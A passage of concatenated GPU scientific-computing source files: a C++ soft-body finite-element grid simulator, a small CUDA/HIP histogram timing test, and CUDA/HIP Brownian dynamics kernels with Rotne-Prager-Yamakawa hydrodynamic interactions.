0; j < input.referenceSdf_->getHostMemory().size(); ++j) { if (abs(input.referenceSdf_->getHostMemory()[j]) < settings.zeroCutoff) input.referenceSdf_->getHostMemory()[j] = 0; //This step is essential for stability } if (settings.filledCells) { WorldGridData<real>::HostArray_t copy = input.referenceSdf_->getHostMemory(); copy.setConstant(real(+1)); const auto size = input.referenceSdf_->getGrid()->getSize(); //mark complete grid cells for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { real values[8]; bool active = false; for (int i = 0; i < 8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = real(1); Integration3D::InterpolationWeight_t wx = settings.sampleIntegrals ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegral(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; if (volume > 0.5) { for (int i = 0; i < 8; ++i) copy[input.referenceSdf_->toLinear(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z)] = 0; } } //repair inner values for (int z = 1; z < size.z() - 1; ++z) for (int y = 1; y < size.y() - 1; ++y) for (int x = 1; x < size.x() - 1; ++x) { bool inner = true; for (int iz = z - 1; iz <= z + 1; ++iz) for (int iy = y - 1; iy <= y + 1; ++iy) for (int ix = x - 1; ix <= x + 1; ix++) { if (copy[input.referenceSdf_->toLinear(ix, iy, iz)] == +1) inner = false; } if (inner) { copy[input.referenceSdf_->toLinear(x, y, z)] = -1; } } input.referenceSdf_->getHostMemory() = copy; //Test / Validation for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { int numInside = 0; bool active = false; for (int i = 0; i < 8; ++i) { real val = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::insideEq(val)) numInside++; if (ar::utils::inside(val)) active = true; } if (numInside != 0 && numInside != 8 && active) { CI_LOG_E("If filledCells==true, each cell should be completely filled or completely empty, but the values are:" << " " << input.referenceSdf_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) << " " << input.referenceSdf_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) << " " << input.referenceSdf_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) << " " << input.referenceSdf_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) << " " << input.referenceSdf_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) << " " << input.referenceSdf_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) << " " << input.referenceSdf_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) << " " << input.referenceSdf_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z)); } } } input.referenceSdf_->copyHostToDevice(); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromFile(const InputSdfSettings & settings) { /* WorldGridPtr grid = std::make_shared<WorldGrid>(settings.voxelResolution, Eigen::Vector3i(settings.offset.x, settings.offset.y, settings.offset.z), Eigen::Vector3i(settings.size.x, settings.size.y, settings.size.z)); WorldGridRealDataPtr sdf = std::make_shared<WorldGridData<real>>(grid); sdf->allocateHostMemory(); std::ifstream i(settings.file, std::ios::in | std::ios::binary); i.seekg(sizeof(int) + 6 * sizeof(float)); std::vector<float> data(grid->getSize().prod()); i.read(reinterpret_cast<char*>(&data[0]), sizeof(float) * grid->getSize().prod()); i.close(); for (size_t j = 0; j < sdf->getHostMemory().size(); ++j) { sdf->getHostMemory()[j] = static_cast<real>(data[j]); } */ std::ifstream i(settings.file, std::ios::in | std::ios::binary); if (!i.is_open()) throw std::exception("Unable to open SDF file"); WorldGridRealDataPtr sdf = WorldGridData<real>::load(i); i.close(); return SoftBodyGrid3D::createFromSdf(settings, sdf); } //--------------------------------------------- // The actual instances: // They only store the settings for simple access // No logic is implemented here //--------------------------------------------- static int debugTimer = 0; SoftBodyGrid3D::SoftBodyGrid3D(const Input& input) : input_(input) , precomputed_(allocatePrecomputed(input)) , state_(allocateState(input)) { allocateTemporary(input); //fill statistics statistics_.numElements = input_.numActiveCells_; statistics_.numFreeNodes = input_.numActiveNodes_; statistics_.numEmptyNodes = input_.grid_->getSize().prod() - input_.numActiveNodes_; statistics_.avgEntriesPerRow = input_.sparsityPattern_.nnz / double(input_.sparsityPattern_.rows); reset(); } SoftBodyGrid3D::~SoftBodyGrid3D() { } void SoftBodyGrid3D::reset() { state_.displacements_.setZero(); state_.velocities_.setZero(); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); state_.advectedSDF_ = input_.referenceSdf_; state_.advectedBoundingBox_ = computeTransformedBoundingBox(input_, state_); state_.gridDisplacements_.setZero(); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); resetTimings(); debugTimer = 0; } void SoftBodyGrid3D::solve(bool dynamic, BackgroundWorker2* worker, bool advect) { resetTemporary(); CudaTimer timer; //1. Forces worker->setStatus("Grid: compute forces"); if (isRecordTimings()) timer.start(); forces_.inplace() = precomputed_.bodyForces_; if (settings_.enableCollision_) { applyCollisionForces(input_, settings_, state_, forces_); } if (isRecordTimings()) { timer.stop(); statistics_.collisionForcesTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; //2. stiffness matrix worker->setStatus("Grid: compute stiffness matrix"); if (isRecordTimings()) timer.start(); computeStiffnessMatrix(input_, state_, settings_, stiffness_, forces_); if (isRecordTimings()) { timer.stop(); statistics_.matrixAssembleTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; #if 0 //DEBUG Eigen::VectorXf forcesEigen = DebugUtils::vectorToEigen(forces_); Eigen::MatrixXf stiffnessEigen = DebugUtils::matrixToEigen(stiffness_); #if 1 cinder::app::console() << "Grid Force Vector:\n" << forcesEigen.transpose() << std::endl; //cinder::app::console() << "Grid Stiffness matrix:\n" << stiffnessEigen << std::endl; try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("StiffnessMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << stiffnessEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is stiffness matrix symmetric? " << (stiffnessEigen.isApprox(stiffnessEigen.transpose(), 1e-5))); int rank = stiffnessEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the stiffness matrix: " << rank << " of " << stiffnessEigen.rows()); if (rank < stiffnessEigen.rows()) { //check if there are empty rows / columns for (int i=0; i<stiffnessEigen.rows(); ++i) { if (stiffnessEigen.row(i).isZero(1e-5)) { CI_LOG_I("Row " << i << " is zero"); } } } #endif //3. Solve if (dynamic) { worker->setStatus("Grid: Newmark compute matrices"); CommonKernels::newmarkTimeIntegration( stiffness_, forces_, precomputed_.lumpedMass_, state_.displacements_, state_.velocities_, settings_.dampingAlpha_, settings_.dampingBeta_, settings_.timestep_, newmarkA_, newmarkB_, settings_.newmarkTheta_); #if 0 //DEBUG Eigen::VectorXf massEigen(input_.numActiveNodes_); precomputed_.lumpedMass_.copyToHost(massEigen.data()); Eigen::MatrixXf newmarkAEigen = DebugUtils::matrixToEigen(newmarkA_); Eigen::VectorXf newmarkBEigen = DebugUtils::vectorToEigen(newmarkB_); #if 1 try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("MassVector.dat", std::ofstream::out | std::ofstream::trunc); f << massEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkAEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkVector.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkBEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is the Newmark matrix symmetric? " << (newmarkAEigen.isApprox(newmarkAEigen.transpose(), 1e-5))); int rank = newmarkAEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the Newmark matrix: " << rank << " of " << newmarkAEigen.rows()); #endif //Testing #if MAKE_NEWMARK_SYMMETRIC==1 newmarkA_ = DebugUtils::makeSymmetric(newmarkA_); #endif worker->setStatus("Grid: CG solve"); Vector3X currentDisplacement = state_.displacements_ + make_real3(settings_.timestep_) * state_.velocities_; //initial guess int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(newmarkA_, newmarkB_, currentDisplacement, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } //Testing if (settings_.debugSaveMatrices_) { CI_LOG_E("save matrices"); DebugUtils::saveToMatlab(newmarkA_, "NewmarkA_" + std::to_string(debugTimer) + ".dat"); DebugUtils::saveToMatlab(newmarkB_, "NewmarkB_" + std::to_string(debugTimer) + ".dat"); } debugTimer++; worker->setStatus("Grid: Newmark compute velocity"); Vector3X currentVelocity(input_.numActiveNodes_); CommonKernels::newmarkComputeVelocity( state_.displacements_, state_.velocities_, currentDisplacement, currentVelocity, settings_.timestep_, settings_.newmarkTheta_); state_.displacements_.inplace() = currentDisplacement; state_.velocities_.inplace() = currentVelocity; } else { worker->setStatus("Grid: CG solve"); state_.displacements_.setZero(); int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(stiffness_, forces_, state_.displacements_, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } } #if 0 //DEBUG Eigen::VectorXf displacementsEigen = DebugUtils::vectorToEigen(state_.displacements_); cinder::app::console() << "Grid Solution Displacements:\n" << displacementsEigen.transpose() << std::endl; Eigen::VectorXf velocitiesEigen = DebugUtils::vectorToEigen(state_.velocities_); cinder::app::console() << "Grid Solution Velocities:\n" << velocitiesEigen.transpose() << std::endl; #endif if (advect) { //4. Advect the levelset //a) compute new bounding box and grid worker->setStatus("Grid: Compute new bounding box"); if (isRecordTimings()) timer.start(); auto newBox = computeTransformedBoundingBox(input_, state_); state_.advectedBoundingBox_ = limitBoundingBox(newBox, state_.advectedBoundingBox_); WorldGridPtr grid = createGridFromBoundingBox(state_.advectedBoundingBox_, input_.grid_->getVoxelResolution(), 3); if (isRecordTimings()) { timer.stop(); statistics_.gridBoundingBoxTime.push_back(timer.duration()); } //b) Diffuse displacements worker->setStatus("Grid: Diffuse Displacements"); if (isRecordTimings()) timer.start(); diffuseDisplacements(input_, state_, state_.gridDisplacements_, diffusionTmp1_, diffusionTmp2_); if (isRecordTimings()) { timer.stop(); statistics_.gridDiffusionTime.push_back(timer.duration()); } //c) Advect levelset worker->setStatus("Grid: Advect Levelset"); auto advectedSdf = std::make_shared<WorldGridData<real>>(grid); advectedSdf->allocateDeviceMemory(); if (isRecordTimings()) timer.start(); advectLevelset(input_, state_.gridDisplacements_, advectedSdf, AdvectionSettings()); if (isRecordTimings()) { timer.stop(); statistics_.gridAdvectionTime.push_back(timer.duration()); } state_.advectedSDF_ = advectedSdf; } worker->setStatus("Grid: done"); } void SoftBodyGrid3D::updateSettings() { precomputed_.bodyForces_.setZero(); precomputed_.lumpedMass_.setZero(); computeMassMatrix(input_, settings_, precomputed_.lumpedMass_); computeBodyForces(input_, settings_, precomputed_.bodyForces_); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); CI_LOG_I("Settings updated, mass matrix and body forces recomputed"); } void SoftBodyGrid3D::allocateTemporary(const Input& input) { forces_ = Vector3X(input.numActiveNodes_); stiffness_ = SMatrix3x3(input.sparsityPattern_); newmarkA_ = SMatrix3x3(input.sparsityPattern_); newmarkB_ = Vector3X(input.numActiveNodes_); const Eigen::Vector3i& size = input.grid_->getSize(); diffusionTmp1_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp2_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); } void SoftBodyGrid3D::resetTemporary() { forces_.setZero(); stiffness_.setZero(); } }
b5093d75cef74286c8eb6a9bd64acf3a0bfc5a00.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include "gputimer.h" #include "hip/hip_runtime.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #include <iostream> using namespace std; const int matrixSize = 1024; const int numberOfColors = 2; __device__ int getGlobalIdx_2D_2D() { int blockId = blockIdx.x + blockIdx.y * gridDim.x; int threadId = blockId * (blockDim.x * blockDim.y) + (threadIdx.y * blockDim.x) + threadIdx.x; return threadId; } __device__ int getGlobalIdx_1D_1D() { return blockIdx.x *blockDim.x + threadIdx.x; } __global__ void histogram(unsigned int *a, unsigned int *b) { int globalId = getGlobalIdx_1D_1D(); atomicAdd(&b[a[globalId]], 1); } void test1(int g, int b) { unsigned int *h_a, *d_a; unsigned int *h_b, *d_b; unsigned int bytes = matrixSize * matrixSize * sizeof(unsigned int); unsigned int bytes1 = numberOfColors * sizeof(unsigned int); GpuTimer timer; h_a = (unsigned int*) malloc(bytes); h_b = (unsigned int*) malloc(bytes1); hipMalloc((void **) &d_a, bytes); hipMalloc((void **) &d_b, bytes1); // init host arrays srand(time(NULL)); for (int i=0; i<matrixSize; i++) { for (int j=0; j<matrixSize; j++) { h_a[i*matrixSize + j] = rand() % numberOfColors; } } for (int i=0; i<numberOfColors; i++) { h_b[i] = 0; } // init gpu arrays hipMemset(d_a, 0, bytes); hipMemset(d_b, 0, bytes); // copy to gpu hipMemcpy(d_a, h_a, bytes, hipMemcpyHostToDevice); hipMemcpy(d_b, h_b, bytes1, hipMemcpyHostToDevice); // kernel call timer.Start(); hipLaunchKernelGGL(( histogram), dim3(g), dim3(b), 0, 0, d_a, d_b); timer.Stop(); cout << timer.Elapsed() << "\t<<<" << g << ", " << b << ">>> " << "\n"; // copy to host /*hipMemcpy(h_b, d_b, bytes1, hipMemcpyDeviceToHost); for (int i=0; i<numberOfColors; i++) { cout << h_b[i] << " "; } cout << "\n";*/ } int main() { test1(1024, 1024); scanf("%d", NULL); return 0; }
b5093d75cef74286c8eb6a9bd64acf3a0bfc5a00.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include "gputimer.h" #include "cuda.h" #include <stdio.h> #include <stdlib.h> #include <time.h> #include <iostream> using namespace std; const int matrixSize = 1024; const int numberOfColors = 2; __device__ int getGlobalIdx_2D_2D() { int blockId = blockIdx.x + blockIdx.y * gridDim.x; int threadId = blockId * (blockDim.x * blockDim.y) + (threadIdx.y * blockDim.x) + threadIdx.x; return threadId; } __device__ int getGlobalIdx_1D_1D() { return blockIdx.x *blockDim.x + threadIdx.x; } __global__ void histogram(unsigned int *a, unsigned int *b) { int globalId = getGlobalIdx_1D_1D(); atomicAdd(&b[a[globalId]], 1); } void test1(int g, int b) { unsigned int *h_a, *d_a; unsigned int *h_b, *d_b; unsigned int bytes = matrixSize * matrixSize * sizeof(unsigned int); unsigned int bytes1 = numberOfColors * sizeof(unsigned int); GpuTimer timer; h_a = (unsigned int*) malloc(bytes); h_b = (unsigned int*) malloc(bytes1); cudaMalloc((void **) &d_a, bytes); cudaMalloc((void **) &d_b, bytes1); // init host arrays srand(time(NULL)); for (int i=0; i<matrixSize; i++) { for (int j=0; j<matrixSize; j++) { h_a[i*matrixSize + j] = rand() % numberOfColors; } } for (int i=0; i<numberOfColors; i++) { h_b[i] = 0; } // init gpu arrays cudaMemset(d_a, 0, bytes); cudaMemset(d_b, 0, bytes); // copy to gpu cudaMemcpy(d_a, h_a, bytes, cudaMemcpyHostToDevice); cudaMemcpy(d_b, h_b, bytes1, cudaMemcpyHostToDevice); // kernel call timer.Start(); histogram<<<g, b>>>(d_a, d_b); timer.Stop(); cout << timer.Elapsed() << "\t<<<" << g << ", " << b << ">>> " << "\n"; // copy to host /*cudaMemcpy(h_b, d_b, bytes1, cudaMemcpyDeviceToHost); for (int i=0; i<numberOfColors; i++) { cout << h_b[i] << " "; } cout << "\n";*/ } int main() { test1(1024, 1024); scanf("%d", NULL); return 0; }
a8d5be61f341feb821fa6a6ae31e7d15ca617732.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * bdhitea_kernel.cu * * Created on: Mar 4, 2013 * Author: alekseenko * * All equations referenced here are from Geyer & Winter, 2009 [doi:10.1063/1.3089668] */ #include "bdhitea.cuh" //#define PRINT_HI_TENSORS // Enable to print tensor values. Should never be used in production. Calling `hipDeviceSetLimit(hipLimitPrintfFifoSize, 900000000);` is recommended if you do not want to lose any values! __global__ void integrateTea_prepare(Coord* d_f, Coord* d_r){ // Precalculate random forces and apply pulling forces const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ // Random force const float var = sqrtf(2.0f * KB * c_par.Temp * c_par.gammaR / c_par.dt);//c_langevin.var; /////// sqrt(2 kb T gamma/dt) float4 df = rforce(d_i); df.x *= var; df.y *= var; df.z *= var; c_tea.rforce[d_i] = df; float4 f = make_float4(d_f[d_i].x, d_f[d_i].y, d_f[d_i].z, 0.f );//c_gsop.d_forces[d_i]; // Copy forces and coordinates to auxillary arrays to avoid races during integration phase c_tea.mforce[d_i] = f; d_f[d_i].x = 0.f; d_f[d_i].y = 0.f; d_f[d_i].z = 0.f; c_tea.coords[d_i] = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); } } __device__ inline float6 integrateTea_RPY(const float4& dr){ // This functions requires `dr` to be normalized and have its original length in its W component // Returns Dij(dr)/Dii, where Dij is Rotne-Prager-Yamakawa tensor submatrix, eq. (3-5) float6 ret; const float ra = dr.w / c_tea.a; float coeffrr, coeffii; if (ra > 2.f){ coeffrr = 0.75f/ra * (1.f - 2.f/ra/ra); coeffii = 0.75f/ra * (1.f + 2.f/3.f/ra/ra); }else{ coeffrr = 3.f*ra/32.f; coeffii = 1.f - 9.f*ra/32.f; } ret._XX = dr.x*dr.x*coeffrr + coeffii; ret._XY = dr.x*dr.y*coeffrr; ret._XZ = dr.x*dr.z*coeffrr; ret._YY = dr.y*dr.y*coeffrr + coeffii; ret._YZ = dr.y*dr.z*coeffrr; ret._ZZ = dr.z*dr.z*coeffrr + coeffii; return ret; } __device__ inline float4 integrateTea_epsilon_local(const float4& coord1, const int idx2, Coord* d_r){ // Function calculates various statistics for sub-tensor responsible for interactions between two given particles // .x, .y, .z --- sum of squares of normalized tensor components, 3 rows, used for C_i in eq. (19) // .w --- sum of normalized tensor components (\sum Dij/Dii), used for \epsilon in eq. (22) float4 dr = make_float4(d_r[idx2].x, d_r[idx2].y, d_r[idx2].z, 0.f); dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; //printf("%f\n", dr.x); dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; //printf("%d kkk %f %f %f %f\n",idx2 , dr.x, dr.y, dr.z, dr.w); float6 d = integrateTea_RPY(dr); dr.w = d._XX + 2*d._XY + 2*d._XZ + d._YY + 2*d._YZ + d._ZZ; // Sum of all 3*3 tensor components dr.x = d._XX*d._XX + d._XY*d._XY + d._XZ*d._XZ; dr.y = d._YX*d._YX + d._YY*d._YY + d._YZ*d._YZ; dr.z = d._ZX*d._ZX + d._ZY*d._ZY + d._ZZ*d._ZZ; return dr; } __global__ void integrateTea_epsilon_unlisted(Coord* d_r){ // Like integrateTea_epsilon, but calculate all-vs-all const int d_i = blockIdx.x * blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; int i; float4 coord = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); float4 sum = make_float4(0.f, 0.f, 0.f, 0.f); for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i != d_i && !c_top.extra[i] && !c_top.extra[d_i]){ sum += integrateTea_epsilon_local(coord, i, d_r); } } c_tea.d_ci[d_i] = make_float4(sum.x, sum.y, sum.z, 0.f); c_tea.d_epsilon[d_i] = sum.w; // Should later be divided by number of non-diagonal degrees-of-freedom in single trajectory } } __device__ inline float4 integrateTea_force(const float4& coord1, const int idx2, const float3& ci, const int idx1){ // Calculate the effective force acting on particle with coordinates `coord1` from particle with index `idx2` // eq. (13,14,19) float4 dr = c_tea.coords[idx2]; dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; float4 f = c_tea.mforce[idx2]; float4 r = c_tea.rforce[idx2]; f.x += r.x * ci.x; f.y += r.y * ci.y; f.z += r.z * ci.z; float6 D = integrateTea_RPY(dr); #ifdef PRINT_HI_TENSORS printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ*ci.z); #endif return make_float4( D._XX*f.x + D._XY*f.y + D._XZ*f.z, D._YX*f.x + D._YY*f.y + D._YZ*f.z, D._ZX*f.x + D._ZY*f.y + D._ZZ*f.z, 0.f); } __global__ void integrateTea_kernel_unlisted(Coord* d_f, Coord* d_r){ // Pairist-free version of integrateTea_kernel const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr ){ int i; float4 coord = c_tea.d_ci[d_i]; // Not coord yet! float4 f = c_tea.mforce[d_i]; float4 df = c_tea.rforce[d_i]; const int tr = d_i / c_tea.Ntot; const float beta_ij = c_tea.d_beta_ij[tr]; float3 ci; // Make ci to be actual C_i coord.w = beta_ij*beta_ij; ci.x = 1.f/sqrtf(1.f + coord.w * coord.x); ci.y = 1.f/sqrtf(1.f + coord.w * coord.y); ci.z = 1.f/sqrtf(1.f + coord.w * coord.z); coord = c_tea.coords[d_i]; // And now it's actually bead coordinates f.x += df.x * ci.x; f.y += df.y * ci.y; f.z += df.z * ci.z; ci.x *= beta_ij; ci.y *= beta_ij; ci.z *= beta_ij; // Calculate effective force const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i == d_i || c_top.extra[d_i] || c_top.extra[i]) continue; df = integrateTea_force(coord, i, ci, d_i); f.x += df.x; f.y += df.y; f.z += df.z; } // Integration step // We've replaced all forces with their `effective` counterparts, so this part of integration process stays the same as in simple langevin integrator const float mult = c_par.dt / c_par.gammaR ; ///c_langevin.hOverZeta; const float3 dr = make_float3(mult*f.x, mult*f.y, mult*f.z); coord.x += dr.x; coord.y += dr.y; coord.z += dr.z; Coord ri = d_r[d_i]; Coord fi = d_f[d_i]; float4 rf_ang = make_float4(0.0, 0.0, 0.0, 0.0); rf_ang = rforce(d_i + c_par.Ntot*c_par.Ntr); if(!c_top.fixed[d_i % c_par.Ntot] && !c_top.extra[d_i]){ ri.x = coord.x; ri.y = coord.y; ri.z = coord.z; ri.fi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.fi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.x; ri.psi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.psi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.y; ri.theta += (c_par.dt/c_par.gammaTheta)*fi.theta + c_par.varTheta*rf_ang.z; } d_r[d_i] = ri; // Update energies /*coord = c_gsop.d_energies[d_i]; coord.w += c_langevin.tempNorm*(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); c_gsop.d_energies[d_i] = coord;*/ } } #undef _XX #undef _XY #undef _XZ #undef _YX #undef _YY #undef _YZ #undef _ZX #undef _ZY #undef _ZZ
a8d5be61f341feb821fa6a6ae31e7d15ca617732.cu
/* * bdhitea_kernel.cu * * Created on: Mar 4, 2013 * Author: alekseenko * * All equations referenced here are from Geyer & Winter, 2009 [doi:10.1063/1.3089668] */ #include "bdhitea.cuh" //#define PRINT_HI_TENSORS // Enable to print tensor values. Should never be used in production. Calling `cudaDeviceSetLimit(cudaLimitPrintfFifoSize, 900000000);` is recommended if you do not want to lose any values! __global__ void integrateTea_prepare(Coord* d_f, Coord* d_r){ // Precalculate random forces and apply pulling forces const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ // Random force const float var = sqrtf(2.0f * KB * c_par.Temp * c_par.gammaR / c_par.dt);//c_langevin.var; /////// sqrt(2 kb T gamma/dt) float4 df = rforce(d_i); df.x *= var; df.y *= var; df.z *= var; c_tea.rforce[d_i] = df; float4 f = make_float4(d_f[d_i].x, d_f[d_i].y, d_f[d_i].z, 0.f );//c_gsop.d_forces[d_i]; // Copy forces and coordinates to auxillary arrays to avoid races during integration phase c_tea.mforce[d_i] = f; d_f[d_i].x = 0.f; d_f[d_i].y = 0.f; d_f[d_i].z = 0.f; c_tea.coords[d_i] = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); } } __device__ inline float6 integrateTea_RPY(const float4& dr){ // This functions requires `dr` to be normalized and have its original length in its W component // Returns Dij(dr)/Dii, where Dij is Rotne-Prager-Yamakawa tensor submatrix, eq. (3-5) float6 ret; const float ra = dr.w / c_tea.a; float coeffrr, coeffii; if (ra > 2.f){ coeffrr = 0.75f/ra * (1.f - 2.f/ra/ra); coeffii = 0.75f/ra * (1.f + 2.f/3.f/ra/ra); }else{ coeffrr = 3.f*ra/32.f; coeffii = 1.f - 9.f*ra/32.f; } ret._XX = dr.x*dr.x*coeffrr + coeffii; ret._XY = dr.x*dr.y*coeffrr; ret._XZ = dr.x*dr.z*coeffrr; ret._YY = dr.y*dr.y*coeffrr + coeffii; ret._YZ = dr.y*dr.z*coeffrr; ret._ZZ = dr.z*dr.z*coeffrr + coeffii; return ret; } __device__ inline float4 integrateTea_epsilon_local(const float4& coord1, const int idx2, Coord* d_r){ // Function calculates various statistics for sub-tensor responsible for interactions between two given particles // .x, .y, .z --- sum of squares of normalized tensor components, 3 rows, used for C_i in eq. (19) // .w --- sum of normalized tensor components (\sum Dij/Dii), used for \epsilon in eq. (22) float4 dr = make_float4(d_r[idx2].x, d_r[idx2].y, d_r[idx2].z, 0.f); dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; //printf("%f\n", dr.x); dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; //printf("%d kkk %f %f %f %f\n",idx2 , dr.x, dr.y, dr.z, dr.w); float6 d = integrateTea_RPY(dr); dr.w = d._XX + 2*d._XY + 2*d._XZ + d._YY + 2*d._YZ + d._ZZ; // Sum of all 3*3 tensor components dr.x = d._XX*d._XX + d._XY*d._XY + d._XZ*d._XZ; dr.y = d._YX*d._YX + d._YY*d._YY + d._YZ*d._YZ; dr.z = d._ZX*d._ZX + d._ZY*d._ZY + d._ZZ*d._ZZ; return dr; } __global__ void 